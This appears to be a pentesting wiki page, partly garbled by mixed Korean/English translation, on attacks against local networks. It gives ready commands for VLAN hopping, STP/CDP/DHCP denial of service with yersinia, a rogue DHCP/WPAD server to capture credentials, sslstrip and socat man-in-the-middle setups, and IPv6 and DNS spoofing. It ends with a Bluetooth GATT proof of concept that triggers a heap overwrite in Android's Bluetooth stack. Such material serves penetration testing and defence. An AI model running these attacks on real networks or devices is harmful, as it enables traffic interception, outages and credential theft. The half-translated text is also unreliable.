root@kali:~# arp-scan -I eth1.250 10.121.5.0/24

</details>
```bash
# Another configuration example
modprobe 8021q
vconfig add eth1 20
ifconfig eth1.20 192.168.1.2 netmask 255.255.255.0 up

# Another configuration example
sudo vconfig add eth0 30
sudo ip link set eth0.30 up
sudo dhclient -v eth0.30

Automatic VLAN Hopper

앞서 다룬 Dynamic Trunking and creating virtual interfaces an discovering hosts inside 공격은 도구에 의해 자동으로 수행됩니다: https://github.com/nccgroup/vlan-hopping—frogger

Double Tagging

공격자가 MAC, IP and VLAN ID of the victim host 값을 알고 있다면, 지정된 VLAN과 피해자의 VLAN으로 프레임을 double tag a frame 하여 패킷을 보낼 수 있습니다. 피해자가 공격자에게 victim won’t be able to connect back 하기 때문에, 공격자는 SNMP 같은 동작을 수행하는 프로토콜과 통신하기 위해 best option for the attacker is communicate via UDP 를 선택하는 것이 좋습니다.

다른 옵션으로 공격자는 TCP port scan spoofing an IP controlled by the attacker and accessible by the victim (아마 인터넷을 통해) 를 실행할 수 있습니다. 그런 다음, 피해자로부터 패킷을 받으면 공격자가 소유한 두 번째 호스트에서 이를 스니핑할 수 있습니다.

이 공격을 수행하려면 scapy를 사용할 수 있습니다: pip install scapy

from scapy.all import *
# Double tagging with ICMP packet (the response from the victim isn't double tagged so it will never reach the attacker)
packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=20)/IP(dst='192.168.1.10')/ICMP()
sendp(packet)

Lateral VLAN Segmentation Bypass

If you have access to a switch that you are directly connected to, you have the ability to bypass VLAN segmentation within the network. Simply switch the port to trunk mode (otherwise known as trunk), create virtual interfaces with the IDs of the target VLANs, and configure an IP address. You can try requesting the address dynamically (DHCP) or you can configure it statically. It depends on the case.

Lateral VLAN Segmentation Bypass

Layer 3 Private VLAN Bypass

In certain environments, such as guest wireless networks, port isolation (also known as private VLAN) settings are implemented to prevent clients connected to a wireless access point from directly communicating with each other. However, a technique has been identified that can circumvent these isolation measures. This technique exploits either the lack of network ACLs or their improper configuration, enabling IP packets to be routed through a router to reach another client on the same network.

The attack is executed by creating a packet that carries the IP address of the destination client but with the router’s MAC address. This causes the router to mistakenly forward the packet to the target client. This approach is similar to that used in Double Tagging Attacks, where the ability to control a host accessible to the victim is used to exploit the security flaw.

Key Steps of the Attack:

1. Crafting a Packet: A packet is specially crafted to include the target client’s IP address but with the router’s MAC address.
2. Exploiting Router Behavior: The crafted packet is sent up to the router, which, due to the configuration, redirects the packet to the target client, bypassing the isolation provided by private VLAN settings.

VTP Attacks

VTP (VLAN Trunking Protocol) centralizes VLAN management. It utilizes revision numbers to maintain VLAN database integrity; any modification increments this number. Switches adopt configurations with higher revision numbers, updating their own VLAN databases.

VTP Domain Roles

• VTP Server: Manages VLANs—creates, deletes, modifies. It broadcasts VTP announcements to domain members.
• VTP Client: Receives VTP announcements to synchronize its VLAN database. This role is restricted from local VLAN configuration modifications.
• VTP Transparent: Doesn’t engage in VTP updates but forwards VTP announcements. Unaffected by VTP attacks, it maintains a constant revision number of zero.

VTP Advertisement Types

• Summary Advertisement: Broadcasted by the VTP server every 300 seconds, carrying essential domain information.
• Subset Advertisement: Sent following VLAN configuration changes.
• Advertisement Request: Issued by a VTP client to request a Summary Advertisement, typically in response to detecting a higher configuration revision number.

VTP vulnerabilities are exploitable exclusively via trunk ports as VTP announcements circulate solely through them. Post-DTP attack scenarios might pivot towards VTP. Tools like Yersinia can facilitate VTP attacks, aiming to wipe out the VLAN database, effectively disrupting the network.

Note: This discussion pertains to VTP version 1 (VTPv1).

yersinia -G # Launch Yersinia in graphical mode

In Yersinia의 그래픽 모드에서 deleting all VTP vlans 옵션을 선택하여 VLAN database를 정리하세요.

STP Attacks

인터페이스에서 BPDU frames를 캡처할 수 없다면 STP attack에 성공할 가능성은 낮습니다.

STP BPDU DoS

많은 BPDUs TCP (Topology Change Notification) 또는 Conf (토폴로지가 생성될 때 전송되는 BPDUs)를 전송하면 스위치들이 과부하되어 올바르게 작동하지 않게 됩니다.

yersinia stp -attack 2
yersinia stp -attack 3
#Use -M to disable MAC spoofing

STP TCP Attack

TCP가 전송되면, switches의 CAM table은 15s 후에 삭제됩니다. 그리고 이러한 종류의 packets를 계속해서 전송하면 CAM table이 지속적으로(또는 매 15segs마다) 재시작되며, 재시작될 때 switch는 hub처럼 동작합니다.

yersinia stp -attack 1 #Will send 1 TCP packet and the switch should restore the CAM in 15 seconds
yersinia stp -attack 0 #Will send 1 CONF packet, nothing else will happen

STP Root Attack

공격자는 네트워크의 STP root가 되기 위해 switch의 동작을 시뮬레이트합니다. 그러면 더 많은 데이터가 공격자를 통해 흐릅니다. 이는 서로 다른 두 switch에 연결되어 있을 때 유용합니다.
이것은 BPDUs CONF packets를 전송하여 priority 값이 실제 root switch의 실제 priority보다 낮다고 알리는 방식으로 수행됩니다.

yersinia stp -attack 4 #Behaves like the root switch
yersinia stp -attack 5 #This will make the device behaves as a switch but will not be root

공격자가 2개의 스위치에 연결되어 있으면 그는 새로운 트리의 루트가 될 수 있고 그 스위치들 간의 모든 트래픽이 그를 통해 전달됩니다 (a MITM attack will be performed).

yersinia stp -attack 6 #This will cause a DoS as the layer 2 packets wont be forwarded. You can use Ettercap to forward those packets "Sniff" --> "Bridged sniffing"
ettercap -T -i eth1 -B eth2 -q #Set a bridge between 2 interfaces to forwardpackages

CDP 공격

CISCO Discovery Protocol (CDP)은 CISCO 장치 간 통신에 필수적이며, 장치들이 서로를 식별하고 구성 정보를 공유할 수 있도록 한다.

수동 데이터 수집

CDP는 모든 포트를 통해 정보를 브로드캐스트하도록 구성되어 있어 보안 위험을 초래할 수 있다. 공격자가 스위치 포트에 연결하면 Wireshark, tcpdump, 또는 Yersinia와 같은 네트워크 스니퍼를 실행할 수 있다. 이로 인해 기기의 모델과 실행 중인 Cisco IOS 버전 등 네트워크 장치에 대한 민감한 정보가 드러날 수 있다. 공격자는 식별된 Cisco IOS 버전에 존재하는 특정 취약점을 노릴 수 있다.

CDP 테이블 플러딩 유도

보다 공격적인 방법은 정당한 CISCO 장치인 것처럼 가장하여 스위치의 메모리를 과부하시켜 Denial of Service (DoS) 공격을 개시하는 것이다. 아래는 테스트용 네트워크 도구인 Yersinia를 사용해 이러한 공격을 시작하는 명령 시퀀스이다:

sudo yersinia cdp -attack 1 # Initiates a DoS attack by simulating fake CISCO devices
# Alternatively, for a GUI approach:
sudo yersinia -G

이 공격 동안 스위치의 CPU와 CDP neighbor table에 큰 부담이 걸려, 과도한 자원 소모로 인해 흔히 **“네트워크 마비”**라고 불리는 상태를 초래합니다.

CDP Impersonation Attack

sudo yersinia cdp -attack 2 #Simulate a new CISCO device
sudo yersinia cdp -attack 0 #Send a CDP packet

You could also use scapy. Be sure to install it with scapy/contrib package.

VoIP 공격 및 VoIP Hopper 도구

VoIP 전화기는 IoT 장치와 점점 더 통합되어 특정 전화번호를 통해 문을 열거나 온도 조절기를 제어하는 등의 기능을 제공합니다. 하지만 이런 통합은 보안 위험을 초래할 수 있습니다.

The tool voiphopper is designed to emulate a VoIP phone in various environments (Cisco, Avaya, Nortel, Alcatel-Lucent). It discovers the voice network’s VLAN ID using protocols like CDP, DHCP, LLDP-MED, and 802.1Q ARP.

VoIP Hopper offers three modes for the Cisco Discovery Protocol (CDP):

1. Sniff Mode (-c 0): VLAN ID를 식별하기 위해 네트워크 패킷을 분석합니다.
2. Spoof Mode (-c 1): 실제 VoIP 장치의 패킷을 모방하는 맞춤 패킷을 생성합니다.
3. Spoof with Pre-made Packet Mode (-c 2): 특정 Cisco IP 전화 모델과 동일한 패킷을 전송합니다.

속도를 위해 권장되는 모드는 세 번째 모드입니다. 이 모드는 다음을 지정해야 합니다:

• 공격자의 네트워크 인터페이스 (-i 매개변수).
• 에뮬레이션할 VoIP 장치의 이름 (-E 매개변수), Cisco 명명 규칙(예: SEP 다음에 MAC 주소)을 따릅니다.

기업 환경에서 기존 VoIP 장치를 모방하려면 다음을 수행할 수 있습니다:

• 전화기의 MAC 라벨을 확인합니다.
• 전화기 디스플레이 설정으로 이동해 모델 정보를 확인합니다.
• VoIP 장치를 노트북에 연결하고 Wireshark로 CDP 요청을 관찰합니다.

세 번째 모드로 도구를 실행하는 예시 명령어는 다음과 같습니다:

voiphopper -i eth1 -E 'SEP001EEEEEEEEE ' -c 2

DHCP 공격

Enumeration

nmap --script broadcast-dhcp-discover
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-16 05:30 EDT
WARNING: No targets were specified, so 0 hosts scanned.
Pre-scan script results:
| broadcast-dhcp-discover:
|   Response 1 of 1:
|     IP Offered: 192.168.1.250
|     DHCP Message Type: DHCPOFFER
|     Server Identifier: 192.168.1.1
|     IP Address Lease Time: 1m00s
|     Subnet Mask: 255.255.255.0
|     Router: 192.168.1.1
|     Domain Name Server: 192.168.1.1
|_    Domain Name: mynet
Nmap done: 0 IP addresses (0 hosts up) scanned in 5.27 seconds

DoS

Two types of DoS는 DHCP 서버에 대해 수행될 수 있다. 첫 번째는 simulate enough fake hosts to use all the possible IP addresses로 구성된다.
이 공격은 DHCP 서버의 응답을 볼 수 있고 프로토콜을 완료할 수 있을 때만 작동한다 (Discover (Comp) –> Offer (server) –> Request (Comp) –> ACK (server)). 예를 들어, 이는 not possible in Wifi networks.

DHCP DoS를 수행하는 또 다른 방법은 DHCP-RELEASE packet using as source code every possible IP를 전송하는 것이다. 그러면 서버는 모두가 IP 사용을 종료했다고 생각할 것이다.

yersinia dhcp -attack 1
yersinia dhcp -attack 3 #More parameters are needed

A more automatic way of doing this is using the tool DHCPing

You could use the mentioned DoS attacks to force clients to obtain new leases within the environment, and exhaust legitimate servers so that they become unresponsive. So when the legitimate try to reconnect, you can server malicious values mentioned in the next attack.

악성 값 설정

악성 DHCP 서버는 /usr/share/responder/DHCP.py에 있는 DHCP 스크립트를 사용해 설정할 수 있습니다. 이는 트래픽을 악성 서버로 리디렉트하여 HTTP 트래픽과 자격증명 등을 캡처하는 네트워크 공격에 유용합니다. 다만 rogue gateway를 설정하는 것은 효과가 떨어지는데, 클라이언트의 아웃바운드 트래픽만 캡처하여 실제 gateway의 응답을 놓치기 때문입니다. 보다 효과적인 공격을 위해서는 rogue DNS 또는 WPAD 서버 설정이 권장됩니다.

Below are the command options for configuring the rogue DHCP server:

• Our IP Address (Gateway Advertisement): Use -i 10.0.0.100 to advertise your machine’s IP as the gateway.
• Local DNS Domain Name: Optionally, use -d example.org to set a local DNS domain name.
• Original Router/Gateway IP: Use -r 10.0.0.1 to specify the IP address of the legitimate router or gateway.
• Primary DNS Server IP: Use -p 10.0.0.100 to set the IP address of the rogue DNS server you control.
• Secondary DNS Server IP: Optionally, use -s 10.0.0.1 to set a secondary DNS server IP.
• Netmask of Local Network: Use -n 255.255.255.0 to define the netmask for the local network.
• Interface for DHCP Traffic: Use -I eth1 to listen for DHCP traffic on a specific network interface.
• WPAD Configuration Address: Use -w “http://10.0.0.100/wpad.dat” to set the address for WPAD configuration, assisting in web traffic interception.
• Spoof Default Gateway IP: Include -S to spoof the default gateway IP address.
• Respond to All DHCP Requests: Include -R to make the server respond to all DHCP requests, but be aware that this is noisy and can be detected.

이 옵션들을 적절히 사용하면 네트워크 트래픽을 효과적으로 가로채기 위해 rogue DHCP 서버를 구축할 수 있습니다.

# Example to start a rogue DHCP server with specified options
!python /usr/share/responder/DHCP.py -i 10.0.0.100 -d example.org -r 10.0.0.1 -p 10.0.0.100 -s 10.0.0.1 -n 255.255.255.0 -I eth1 -w "http://10.0.0.100/wpad.dat" -S -R

EAP Attacks

다음은 802.1X 구현에 대해 사용할 수 있는 몇 가지 공격 전술입니다:

• Active brute-force password grinding via EAP
• 잘못된 형식의 EAP 콘텐츠로 RADIUS 서버를 공격 **(exploits)
• EAP 메시지 캡처 및 오프라인 비밀번호 크래킹 (EAP-MD5 및 PEAP)
• EAP-MD5 인증을 강제로 사용해 TLS 인증서 검증을 우회
• hub 또는 유사 장치를 사용해 인증할 때 악성 네트워크 트래픽을 주입

공격자가 피해자와 인증 서버 사이에 위치해 있다면, 필요에 따라 인증 프로토콜을 EAP-MD5로 강제로 약화시켜 인증 시도를 캡처할 수 있습니다. 그런 다음, 다음을 사용해 이를 brute-force할 수 있습니다:

eapmd5pass –r pcap.dump –w /usr/share/wordlist/sqlmap.txt

FHRP (GLBP & HSRP) 공격

FHRP (First Hop Redundancy Protocol)은 핫 중복 라우팅 시스템을 생성하도록 설계된 네트워크 프로토콜 계열입니다. FHRP를 사용하면 물리적 라우터를 단일 논리 장치로 결합할 수 있어 장애 허용성이 향상되고 부하 분산에 도움이 됩니다.

Cisco Systems 엔지니어들은 GLBP와 HSRP라는 두 가지 FHRP 프로토콜을 개발했습니다.

GLBP & HSRP Attacks

RIP

Routing Information Protocol (RIP)에는 RIP, RIPv2, RIPng의 세 가지 버전이 존재합니다. RIP와 RIPv2는 UDP 포트 520을 통해 피어에게 데이터그램을 전송하고, RIPng는 IPv6 멀티캐스트를 통해 UDP 포트 521로 데이터그램을 브로드캐스트합니다. RIPv2는 MD5 인증을 지원하도록 도입되었으며, 반면 RIPng는 네이티브 인증을 포함하지 않고 대신 IPv6에서 선택적 IPsec AH 및 ESP 헤더에 의존합니다.

• RIP and RIPv2: 통신은 포트 520의 UDP 데이터그램을 통해 이루어집니다.
• RIPng: IPv6 멀티캐스트를 통해 UDP 포트 521로 데이터그램을 브로드캐스트합니다.

RIPv2가 MD5 인증을 지원하는 반면 RIPng는 네이티브 인증을 포함하지 않고 IPv6의 IPsec AH 및 ESP 헤더에 의존한다는 점을 유의하세요.

EIGRP 공격

**EIGRP (Enhanced Interior Gateway Routing Protocol)**는 동적 라우팅 프로토콜입니다. 거리 벡터 프로토콜입니다. 인증과 수동 인터페이스 설정이 없으면 공격자가 EIGRP 라우팅을 교란하여 **라우팅 테이블 오염(routing table poisoning)**을 일으킬 수 있습니다. 또한 EIGRP 네트워크(즉, autonomous system)는 평면 구조로 구분 영역이 없습니다. 공격자가 **경로를 주입(inject)**하면 이 경로는 EIGRP 자율 시스템 전체에 전파될 가능성이 높습니다.

EIGRP 시스템을 공격하려면 정상적인 EIGRP 라우터와 이웃(neighbourhood) 관계를 수립해야 하며, 이는 기본적인 정찰부터 다양한 주입 공격에 이르기까지 많은 가능성을 열어줍니다.

FRRouting을 사용하면 BGP, OSPF, EIGRP, RIP 등 여러 프로토콜을 지원하는 가상 라우터를 구현할 수 있습니다. 공격자 시스템에 이를 배포하기만 하면 라우팅 도메인에서 합법적인 라우터인 척할 수 있습니다.

EIGRP Attacks

Coly는 EIGRP 브로드캐스트를 가로채는 기능을 제공합니다. 또한 패킷 주입을 허용하여 라우팅 구성을 변경하는 데 사용할 수 있습니다.

OSPF

Open Shortest Path First (OSPF) 프로토콜에서는 라우터 간 보안 통신을 위해 MD5 인증이 일반적으로 사용됩니다. 그러나 Loki나 John the Ripper 같은 도구를 사용하면 이 보안 수단을 무력화할 수 있습니다. 이러한 도구는 MD5 해시를 캡처하고 크랙할 수 있어 인증 키를 노출시킵니다. 일단 이 키를 얻으면 새로운 라우팅 정보를 주입할 수 있습니다. 경로 매개변수를 구성하고 탈취된 키를 설정하려면 각각 Injection 및 Connection 탭을 사용합니다.

• MD5 해시 캡처 및 크래킹: Loki, John the Ripper 등의 도구를 사용합니다.
• 경로 매개변수 구성: Injection 탭을 통해 수행됩니다.
• 탈취된 키 설정: Connection 탭에서 키를 설정합니다.

Other Generic Tools & Sources

• Above: 네트워크 트래픽을 스캔하고 취약점을 찾는 도구
• 네트워크 공격에 대한 추가 정보는 여기에서 확인할 수 있습니다.

Spoofing

공격자는 가짜 DHCP 응답을 보내 네트워크의 신규 구성원의 모든 네트워크 매개변수(GW, IP, DNS)를 설정합니다.

Ettercap
yersinia dhcp -attack 2 #More parameters are needed

ARP Spoofing

Check the previous section.

ICMPRedirect

ICMP Redirect는 공격자가 특정 IP에 도달하는 최적 경로임을 알리는 ICMP 패킷(type 1, code 5)을 전송하는 것입니다. 그 후 피해자가 해당 IP에 접속하려 할 때 패킷을 공격자를 통해 전송하게 됩니다.

Ettercap
icmp_redirect
hping3 [VICTIM IP ADDRESS] -C 5 -K 1 -a [VICTIM DEFAULT GW IP ADDRESS] --icmp-gw [ATTACKER IP ADDRESS] --icmp-ipdst [DST IP ADDRESS] --icmp-ipsrc [VICTIM IP ADDRESS] #Send icmp to [1] form [2], route to [3] packets sent to [4] from [5]

DNS Spoofing

attacker는 victim이 요청한 일부(또는 모든) domains를 resolve합니다.

set dns.spoof.hosts ./dns.spoof.hosts; dns.spoof on

dnsmasq로 자체 DNS 구성

apt-get install dnsmasq
echo "addn-hosts=dnsmasq.hosts" > dnsmasq.conf
echo "127.0.0.1   domain.example.com" > dnsmasq.hosts
sudo dnsmasq -C dnsmasq.conf --no-daemon
dig @localhost domain.example.com # Test the configured DNS

로컬 게이트웨이

시스템과 네트워크로 가는 경로가 여러 개 존재하는 경우가 많다. 로컬 네트워크 내의 MAC addresses 목록을 만든 후, _gateway-finder.py_를 사용해 IPv4 포워딩을 지원하는 호스트를 식별하라.

</details>


### [Spoofing LLMNR, NBT-NS, and mDNS](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)

DNS 조회가 실패할 때 로컬 호스트 해석을 위해 Microsoft 시스템은 **Link-Local Multicast Name Resolution (LLMNR)** 및 **NetBIOS Name Service (NBT-NS)**에 의존합니다. 마찬가지로 **Apple Bonjour**와 **Linux zero-configuration** 구현은 네트워크 내 시스템을 발견하기 위해 **Multicast DNS (mDNS)**를 사용합니다. 이러한 프로토콜들은 인증되지 않은 특성과 UDP를 통한 브로드캐스트 메시지 전송 방식 때문에, 사용자를 악성 서비스로 리디렉션하려는 공격자에 의해 악용될 수 있습니다.

Responder를 사용하여 호스트가 찾는 서비스를 가장해 가짜 응답을 보낼 수 있습니다.\
자세한 내용은 [how to Impersonate services with Responder](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)에서 확인하세요.

### [Spoofing WPAD](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)

브라우저는 일반적으로 **Web Proxy Auto-Discovery (WPAD) protocol to automatically acquire proxy settings**를 사용해 프록시 설정을 자동으로 획득합니다. 이는 예를 들어 "http://wpad.example.org/wpad.dat"와 같은 URL을 통해 서버에서 구성 세부 정보를 가져오는 것을 포함합니다. 클라이언트가 이 서버를 발견하는 방법은 여러 메커니즘을 통해 이루어질 수 있습니다:

- **DHCP**를 통해, 특수 코드 252 항목을 사용하여 발견이 용이해집니다.
- **DNS**를 통해, 로컬 도메인 내에서 _wpad_라는 호스트명을 검색합니다.
- **Microsoft LLMNR 및 NBT-NS**를 통해, DNS 조회가 실패할 경우의 폴백 메커니즘으로 사용됩니다.

도구 Responder는 이 프로토콜을 악용해 **malicious WPAD server**로 동작합니다. DHCP, DNS, LLMNR 및 NBT-NS를 사용해 클라이언트를 속여 자신에게 연결하게 만듭니다. Responder로 서비스를 가장하는 방법에 대해 더 깊이 알고 싶다면 [check this](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)을 참조하세요.

### [Spoofing SSDP and UPnP devices](spoofing-ssdp-and-upnp-devices.md)

네트워크에서 다양한 서비스를 제공해 사용자를 속여 **평문 자격증명(plain-text credentials)**을 입력하게 만들 수 있습니다. 이 공격에 대한 자세한 정보는 [**Spoofing SSDP and UPnP Devices**](spoofing-ssdp-and-upnp-devices.md)에서 확인하세요.

### IPv6 Neighbor Spoofing

이 공격은 ARP Spoofing과 매우 유사하지만 IPv6 환경에서 발생합니다. 피해자로 하여금 GW의 IPv6 주소가 공격자의 MAC을 가지고 있다고 믿게 만들 수 있습니다.
```bash
sudo parasite6 -l eth0 # This option will respond to every requests spoofing the address that was requested
sudo fake_advertise6 -r -w 2 eth0 <Router_IPv6> #This option will send the Neighbor Advertisement packet every 2 seconds

sysctl -w net.ipv6.conf.all.forwarding=1 4
ip route add default via <ROUTER_IPv6> dev wlan0
fake_router6 wlan0 fe80::01/16

dhcp6.spoof on
dhcp6.spoof.domains <list of domains>

mitm6

apt-get install sslstrip
sslstrip -w /tmp/sslstrip.log --all - l 10000 -f -k
#iptables --flush
#iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -A INPUT -p tcp --destination-port 10000 -j ACCEPT

sudo nc -l -p 80
socat TCP4-LISTEN:80,fork,reuseaddr -

FILENAME=server
# Generate a public/private key pair:
openssl genrsa -out $FILENAME.key 1024
# Generate a self signed certificate:
openssl req -new -key $FILENAME.key -x509 -sha256 -days 3653 -out $FILENAME.crt
# Generate the PEM file by just appending the key and certificate files:
cat $FILENAME.key $FILENAME.crt >$FILENAME.pem

sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 -

sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0  openssl-connect:[SERVER]:[PORT],verify=0

</details>


### 활성 탐지 노트

UDP 패킷을 요청된 포트를 갖고 있지 않은 장치로 보낼 경우 ICMP (Port Unreachable)가 전송된다는 점을 고려하라.

### **ARP discover**

ARP 패킷은 네트워크 내에서 어떤 IP들이 사용 중인지 발견하는 데 사용된다. PC는 가능한 각 IP 주소에 대해 요청을 보내야 하며 사용 중인 주소만 응답한다.

### **mDNS (multicast DNS)**

Bettercap은 MDNS 요청을 (각 X ms마다) 보내 **\_services\_.dns-sd.\_udp.local** 를 질의한다. 이 패킷을 받은 머신은 보통 이 요청에 응답한다. 그런 다음 'services'에 응답하는 머신만 검색한다.

**도구**

- Avahi-browser (--all)
- Bettercap (net.probe.mdns)
- Responder

### **NBNS (NetBios Name Server)**

Bettercap은 137/UDP 포트로 브로드캐스트 패킷을 보내 "CKAAAAAAAAAAAAAAAAAAAAAAAAAAA"라는 이름을 요청한다.

### **SSDP (Simple Service Discovery Protocol)**

Bettercap은 모든 종류의 서비스를 찾기 위해 SSDP 패킷을 브로드캐스트한다 (UDP Port 1900).

### **WSD (Web Service Discovery)**

Bettercap은 서비스를 찾기 위해 WSD 패킷을 브로드캐스트한다 (UDP Port 3702).


## Bluetooth (L2CAP/ATT/GATT) 공격

- Android Fluoride는 L2CAP PSMs를 통해 서비스를 노출한다 (e.g., SDP 0x0001, RFCOMM 0x0003, BNEP 0x000F, AVCTP 0x0017/0x001B, AVDTP 0x0019, ATT/GATT 0x001F). 서비스는 다음을 통해 등록된다:
```c
uint16_t L2CA_Register2(uint16_t psm, const tL2CAP_APPL_INFO& p_cb_info,
bool enable_snoop, tL2CAP_ERTM_INFO* p_ertm_info,
uint16_t my_mtu, uint16_t required_remote_mtu,
uint16_t sec_level);

acl  = ACLConnection(src_bdaddr, dst_bdaddr, auth_mode='justworks')
gatt = acl.l2cap_connect(psm=PSM_ATT, mtu=672)
gatt.send_frag(p8(GATT_READ)+p16(1234))
print(gatt.recv())

# GATT_REQ_READ_MULTI_VAR (0x20), MTU=55
acl  = ACLConnection(interface, bdaddr)
gatt = acl.l2cap_connect(psm=PSM_ATT, mtu=55)
pkt  = b'\x20'  # opcode
pkt += p16(9); pkt += p16(9); pkt += p16(9); pkt += p16(9)
gatt.send(pkt)
# On 4th insert: p_buf->len=55 (1 + 3*(16+2)), total_len=73 -> len=16-(73-55)=-2 -> ~64KB overwrite